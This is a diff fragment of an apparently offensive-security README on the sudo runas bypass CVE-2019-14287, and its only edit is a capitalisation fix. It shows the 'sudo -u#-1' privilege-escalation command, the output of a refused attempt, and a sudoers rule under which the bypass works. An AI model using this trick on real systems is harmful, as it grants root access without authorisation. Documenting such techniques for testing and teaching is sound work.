offsec-ttps/CVE2019-14287/README.md

 john@blak-off:/home/blak$ sudo -u#-1 bash -u
 Sorry, user john is not allowed to execute '/bin/bash -u' as #-1 on blak-off.
 ```
-## But it works when i used "/usr/bin/id"
+## But it works when I used "/usr/bin/id"
 ```
 john    ALL=(ALL, !root) /usr/bin/id
 ```